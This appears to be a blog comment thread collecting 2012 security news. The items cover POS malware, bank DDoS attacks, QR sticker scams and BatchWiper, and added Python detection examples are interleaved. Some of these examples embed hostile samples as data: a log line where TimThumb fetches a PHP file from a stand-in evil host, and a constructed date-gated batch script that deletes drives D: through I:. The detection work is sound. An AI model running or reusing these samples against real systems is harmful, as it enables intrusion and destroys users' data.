    The holiday season is here and with it comes a rise in credit card use. Cybercriminals know this and have been infecting consumer PCs with information stealing trojans for years. Recently however, Seculert identified a growing trend whereby cybercriminals are targeting Point of Sale (POS) systems. Instead of going through the trouble of infecting tens of thousands of consumer PCs or physically installing a skimmer, an attacker can achieve the same results by targeting just a few POS systems with specially crafted malware. Dexter is one example of such malware.

    Dexter is custom-made malware that has been used over the past 2-3 months to infect hundreds of POS systems. Some of the targeted POS systems include big-name retailers, hotels, restaurants and even private parking providers.

  42. Tomi Engdahl says:

    DDoS and Security Reports: The Arbor Networks Security Blog
    http://ddos.arbornetworks.com/2012/12/lessons-learned-from-the-u-s-financial-services-ddos-attacks/

    During the months of September and October we witnessed targeted and very serious DDoS attacks against U.S. based financial institutions. They were very much premeditated, focused, advertised before the fact, and executed to the letter.

    In the case of the September 2012 DDoS attack series, many compromised PHP Web applications were used as bots in the attacks. Additionally, many WordPress sites, often using the out-of-date TimThumb plugin, were being compromised around the same time. Joomla and other PHP-based applications were also compromised. Unmaintained sites running out-of-date extensions are easy targets and the attackers took full advantage of this to upload various PHP webshells which were then used to further deploy attack tools. Attackers connect to the compromised webservers hosting the tools directly or through intermediate servers/proxies/scripts and issue attack commands.

    Lessons Learned

    There are multiple lessons to be learned from these attacks, by everyone involved – the targeted enterprises, their managed security providers, Website and Web application administrators, and the vendor community.

    For enterprises, it is clear that typical perimeter defenses such as firewalls and IPS are not effective when dealing with DDoS attacks, as each technology inline to the target is actually a potential bottleneck. These devices can be an important part of a layered defense strategy but they were built for problems far different than today’s complex DDoS threat.

    Providers of managed security services have begun to evaluate their deployments and mitigation capacity. These attacks were unique in that they targeted multiple organizations within the same vertical, putting a strain on the capacity of providers’ cloud-based mitigation services.

    What these attacks have continued to demonstrate is that DDoS will continue to be a popular and increasingly complex attack vector. DDoS is no longer simply a network issue, but is increasingly a feature or additional aspect of other threats. The motivation of modern attackers can be singular, but the threat landscape continues to become more complex and mixes various threats to increase the likelihood of success.

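The Arbor post above describes two things a web administrator can actually look for in their own logs: TimThumb being asked to fetch a remote file, and a PHP script being executed from an upload directory after a webshell was dropped. The following is an added example (not code from the Arbor post, the commenter, or any of the projects named) that runs those two heuristics over a handful of constructed Apache-style log lines. The log lines, the IP addresses (documentation ranges), the upload-directory list and the thresholds are all assumptions made for the illustration; the heuristics are deliberately simple and will need tuning for a real site.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines for illustration only; not from the
# Arbor post or any real incident. 203.0.113.x / 198.51.100.x / 192.0.2.x are
# RFC 5737 documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Sep/2012:10:01:12 +0000] "GET /wp-content/themes/demo/timthumb.php?src=http://blogger.com.evil.example/x.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Sep/2012:10:02:01 +0000] "GET /wp-content/themes/demo/timthumb.php?src=/wp-content/uploads/2012/09/photo.jpg&w=300 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Sep/2012:10:03:44 +0000] "POST /wp-content/uploads/cache/a1b2c3.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Sep/2012:10:03:50 +0000] "POST /wp-content/uploads/cache/a1b2c3.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
192.0.2.9 - - [20/Sep/2012:10:04:10 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# ip, ident, user, [timestamp], "METHOD target protocol", status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed: directories that should only hold static uploads. A server-side
# script executing from one of these is a classic dropped-webshell sign.
UPLOAD_DIRS = ("/wp-content/uploads/", "/images/", "/media/")
SCRIPT_EXT = (".php", ".phtml", ".php5")


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query)
    return rec


def findings_for(rec):
    """Return the list of heuristic reasons that fire for one parsed request."""
    reasons = []
    path = rec["path"].lower()
    # 1. TimThumb asked to fetch an external URL via src= (the old remote-fetch
    #    abuse pattern; a legitimate src is a local path).
    if path.endswith("timthumb.php"):
        for src in rec["query"].get("src", []):
            if urlsplit(src).scheme.lower() in ("http", "https"):
                reasons.append(f"timthumb remote src {src}")
    # 2. POST to a script that lives where only uploads should be.
    if (rec["method"] == "POST"
            and path.endswith(SCRIPT_EXT)
            and any(path.startswith(d) for d in UPLOAD_DIRS)):
        reasons.append(f"POST to script in upload dir {rec['path']}")
    return reasons


def scan_log(text):
    """Return {client_ip: [reasons, ...]} for every request that trips a heuristic."""
    hits = {}
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for reason in findings_for(rec):
            hits.setdefault(rec["ip"], []).append(reason)
    return hits


if __name__ == "__main__":
    for ip, reasons in scan_log(SAMPLE_LOG).items():
        print(ip)
        for reason in reasons:
            print("   ", reason)
```

On the constructed sample only 203.0.113.5 is reported: once for the remote `src=` fetch and twice for the POSTs to the script in the upload directory. The benign thumbnail request and the ordinary login POST are not flagged. Grouping by client IP is what makes the sequence readable as one intrusion (exploit, then shell usage) rather than as three unrelated lines.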
  43. Tomi Engdahl says:

    PNC and other banks have experienced an unusual volume of internet traffic. As a result, some customers may experience slowness or difficulty when logging into online and mobile banking.

    Source: https://www.facebook.com/pncbank/posts/463260427064245

  44. Tomi Engdahl says:

    That square QR barcode on the poster? Check it’s not a sticker
    Crooks slap on duff codes leading to evil sites
    http://www.theregister.co.uk/2012/12/10/qr_code_sticker_scam/

    Cybercrooks are putting up stickers featuring URLs embedded in Quick Response codes (QR codes) as a trick designed to drive traffic to dodgy sites.

    By using QR codes (rather than links) as a jump-off point to dodgy sites, cybercrooks can disguise the ultimate destination of links.

    Security watchers have already seen spam messages pointing to URLs that use embedded QR codes. Now crooks have gone one step further by printing out labels and leaving them in well trafficked locations.

    “we’ve seen criminals using bad QR codes in busy places putting them on stickers and putting them over genuine ones in airports and city centres.”

    “If users want to make sure that their mobile is protected they should consider a QR reader that can check a website’s reputation before visiting it,”

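The advice in the Register piece is that a QR reader should show you, and ideally judge, the destination before it opens it. As an added example (not code from the article, the commenter, or any QR reader product), here is the kind of local pre-check such a reader can do on the decoded payload before any network request is made: it looks only at the URL's structure, so it cannot replace a reputation lookup, but it catches the tricks that make a sticker-swapped code effective. The shortener list, file extensions and wording of the warnings are assumptions for the illustration.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumed list of common shorteners. They are not malicious in themselves; the
# point is that, like the QR code, they hide where you will actually end up.
SHORTENERS = {"bit.ly", "goo.gl", "tinyurl.com", "t.co", "is.gd", "ow.ly"}
# Assumed: a poster link should lead to a page, not straight to an installer.
EXECUTABLE_EXT = (".apk", ".exe", ".jar", ".scr")


def qr_url_warnings(payload):
    """Return a list of warnings for a decoded QR payload.

    An empty list means no heuristic fired. It does not mean the site is safe;
    a reputation check is still the right next step.
    """
    payload = payload.strip()
    parts = urlsplit(payload)
    scheme = parts.scheme.lower()
    if scheme not in ("http", "https"):
        # tel:, sms:, market:, javascript: ... do something other than browse.
        return [f"non-web scheme {scheme or '(none)'!r}"]

    warnings = []
    host = (parts.hostname or "").lower()

    # user@host: the part before '@' is what a casual glance reads as the site.
    if "@" in parts.netloc:
        warnings.append("credentials before '@' hide the real host")

    # A bare IP is rarely how a real venue or airport publishes a link.
    try:
        ipaddress.ip_address(host)
        warnings.append("host is a raw IP address")
    except ValueError:
        pass

    # Internationalised label: a look-alike of a familiar brand is possible.
    if "xn--" in host:
        warnings.append("punycode label in host (possible look-alike domain)")

    if host in SHORTENERS:
        warnings.append("URL shortener hides the final destination")

    try:
        port = parts.port
    except ValueError:
        port = None
        warnings.append("malformed port")
    if port not in (None, 80, 443):
        warnings.append(f"non-standard port {port}")

    if parts.path.lower().endswith(EXECUTABLE_EXT):
        warnings.append("link points straight at an installable/executable file")

    if scheme == "http":
        warnings.append("plain HTTP, destination can be tampered with in transit")

    return warnings


if __name__ == "__main__":
    # Constructed payloads, not taken from any real sticker.
    for sample in ("https://www.example.com/tickets",
                   "http://user:pw@203.0.113.5:8080/app.apk",
                   "https://bit.ly/abc123",
                   "tel:+15551234567"):
        print(sample, "->", qr_url_warnings(sample) or "no warnings")
```

The decision of what to do with a non-empty list belongs to the reader's UI (show the full URL, require an explicit tap, or refuse), but the check itself is cheap and works offline, which matters for a scanner used in an airport.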
  45. Tomi Engdahl says:

    In 2012 Kaspersky Lab detected three significant malware programs that were used in cyber war operations: Flame, Gauss and miniFlame.

    The Flame: Questions and Answers
    https://www.securelist.com/en/blog/208193522/The_Flame_Questions_and_Answers

    Gauss: Nation-state cyber-surveillance meets banking Trojan
    https://www.securelist.com/en/blog/208193767/

    miniFlame aka SPE: “Elvis and his friends”
    http://www.securelist.com/en/blog/763/miniFlame_aka_SPE_Elvis_and_his_friends

  47. Tomi Engdahl says:

    Watch out for this! New malware inflating Android users’ phone bills

    Malware detected on Android devices this fall sends text messages using the victim’s phone. The victim is not likely to notice anything until the operator cuts off the connection because of the soaring phone bill.

    Security company Cloudmark, which encountered the program, says this is the first botnet it has found that uses mobile phones to send spam messages.

    The malware spreads from a server in Hong Kong that offers downloads of two contaminated games (Angry Birds Star Wars and Need for Speed Most Wanted, both of which include the unpleasant malware surprise).

    Hoax messages may egg recipients on to download the malware.

    The fresh botnet malware still seems to be in the test phase, but spam message volumes are rising. At the moment it seems to send SMS only to U.S. phone numbers.

    As a precaution, load Android software only from trusted app stores, such as the Google Play Store.

    Source: http://m.tietoviikko.fi/Uutiset/Varo+t%C3%A4t%C3%A4!+Uusi+haittaohjelma+paisuttaa+Android-k%C3%A4ytt%C3%A4jien+puhelinlaskut+pilviin

  48. Tomi Engdahl says:

    How spyware on rental PCs captured users’ most intimate moments
    PC Rental Agent was supposed to stem theft. Instead, it sparked a firestorm.
    http://arstechnica.com/security/2012/12/how-spyware-on-rental-pcs-captured-users-most-intimate-moments/

    “The Byrd’s were upset that their privacy had been intruded on and someone was likely looking at C. Byrd while she was undressed,” a Casper Police officer identified as L. Starnes wrote in the report. “The Byrd’s [sic] wanted to know why Aaron’s was using software to look at them when the computer was paid off.”

    Brian and Crystal Byrd weren’t the only ones interested in the secret spy feature. In September, the US Federal Trade Commission secured an agreement that settled accusations that seven rent-to-own (RTO) stores and a software design firm surreptitiously captured end users’ most intimate moments. The charges of unfair and deceptive gathering of consumers’ personal information stemmed from the use of PC Rental Agent, a software package that is also the subject of a federal lawsuit accusing Pennsylvania-based DesignerWare, the rent-to-own stores, and their corporate parent of violating federal wiretap statutes.

    According to court records, a training manual DesignerWare provided its customers contained an admonition that said: “Caution, using Level#3 (prompting of the webcam) may alert the user because most webcams have a light that will flash briefly when activated. Also, prompting for information may make them suspicious. Therefore, it is best to try the less intrusive methods first (Level# 1 & 2).”

    No one claims to know how many PCs were monitored by PC Rental Agent.

    That’s up to you. Some rental dealers like to make renters aware thinking it will deter them from forcing them to activate the agent, others don’t reveal it.”

    The allegations contained in the complaint quickly got the attention of officials at the FTC and touched off a national debate about computer privacy.

    During its earliest incarnations, the program provided little more than a kill switch to render a computer useless in the event that a customer held on to it without making payments as promised. But to Kelly’s chagrin, the software didn’t stem the rate of PC losses.

    The resulting Detective Mode module was introduced in 2007 or 2008 and operated at a single level that took a screenshot and recorded keystrokes every two minutes.
    Over time, Detective Mode acquired additional capabilities,

    “It was a highly restricted program that was only built, installed, and activated by a company’s Loss Prevention Officer (LPO) to determine where and who was using the computer so it could be recovered,”

  49. Tomi Engdahl says:

    New Malware Wiping Data On Computers In Iran
    http://it.slashdot.org/story/12/12/18/2134253/new-malware-wiping-data-on-computers-in-iran

    “Iran’s computer emergency response team is reporting new malware targeting computers in the country that is wiping data from partitions D through I. It is set to launch on only particular dates.”

    ‘While there has been other data-wiping malware targeting Iran and other Middle East countries such as Wiper and Shamoon, researchers said there is no immediate connection.’

  50. Tomi Engdahl says:

    Baby got .BAT: Old-school malware terrifies Iran with del *.*
    http://www.theregister.co.uk/2012/12/19/batchwiper/

    A surprisingly simple disk-wiping malware has set off alarm bells in Iran after surfacing in the Middle East nation.

    The software nasty deletes everything on storage drives attached to infected Windows PCs on specific dates, according to the Iranian security emergency response team. The malware was detected in one or more targeted attacks although the identity of the intended victim is not known.

    Its operation is similar to the data-destroying worm Shamoon that ransacked Gulf oil giants earlier this year, but the two pieces of software otherwise appear unrelated.

    BatchWiper, as the snared malware’s name suggests, uses a Windows batch file to remove files from infected machines, according to an analysis by security tools biz AlienVault.

    A self-extracting RAR archive called GrooveMonitor.exe is used to drop the malware’s files onto a system.

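The two reports above agree on the shape of the wiper: a plain batch file, gated on particular dates, that deletes everything on drives D: through I:. That shape is easy to hunt for statically. The following is an added example (not code from the Register article, AlienVault, the Iranian CERT, or the commenter) that scans batch-file text for drive-root deletes combined with a `%date%` comparison and reports which drives and trigger dates it finds. The sample scripts are constructed for the illustration, deliberately written to match the described behaviour, and are not the BatchWiper sample; do not run them.

```python
import re

# Constructed batch script mirroring the behaviour described above (date gate,
# then recursive deletes of D: through I:). NOT the real sample. Do not run.
SAMPLE_BAT = r"""@echo off
if "%date:~-10%"=="2012-12-10" goto wipe
if "%date:~-10%"=="2013-01-21" goto wipe
goto end
:wipe
del "D:\*.*" /q /s /f
del "E:\*.*" /q /s /f
del "F:\*.*" /q /s /f
del "G:\*.*" /q /s /f
del "H:\*.*" /q /s /f
del "I:\*.*" /q /s /f
:end
exit
"""

# Constructed benign build script for comparison: deletes, but not drive roots
# and not on a date condition.
BENIGN_BAT = r"""@echo off
del "%TEMP%\build\*.obj" /q
xcopy src\*.* build\ /s
"""

# A delete/format-class command whose target is a whole drive root (X:\*.*).
DESTRUCTIVE_RE = re.compile(
    r'^\s*(?:del|erase|rd|rmdir|format)\b[^\n]*?"?([A-Za-z]):\\\*\.\*"?',
    re.IGNORECASE | re.MULTILINE,
)
# Any reference to the %date% pseudo-variable, i.e. behaviour keyed on the clock.
DATE_GATE_RE = re.compile(r'%date', re.IGNORECASE)
# Date literals in the two layouts cmd.exe users commonly compare against.
DATE_LITERAL_RE = re.compile(r'\b(\d{4}-\d{2}-\d{2}|\d{2}/\d{2}/\d{4})\b')


def analyse_batch(text):
    """Summarise wiper-like traits of a batch script.

    Returns drives targeted by root-level deletes, whether execution is keyed
    on %date%, the date literals compared against, and an overall verdict that
    requires both traits together (a plain cleanup script has neither).
    """
    drives = sorted({m.group(1).upper() for m in DESTRUCTIVE_RE.finditer(text)})
    date_gated = bool(DATE_GATE_RE.search(text))
    dates = sorted(set(DATE_LITERAL_RE.findall(text))) if date_gated else []
    return {
        "drives_wiped": drives,
        "date_gated": date_gated,
        "trigger_dates": dates,
        "suspicious": bool(drives) and date_gated,
    }


if __name__ == "__main__":
    for name, script in (("sample", SAMPLE_BAT), ("benign", BENIGN_BAT)):
        print(name, analyse_batch(script))
```

The verdict deliberately needs both traits: drive-root deletes alone also describe a careless cleanup script, and `%date%` alone also describes a log-rotation job. A detection written this way also gives the responder something actionable, the trigger dates, which is exactly what you want to know first when a wiper is found on a network but has not yet fired.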
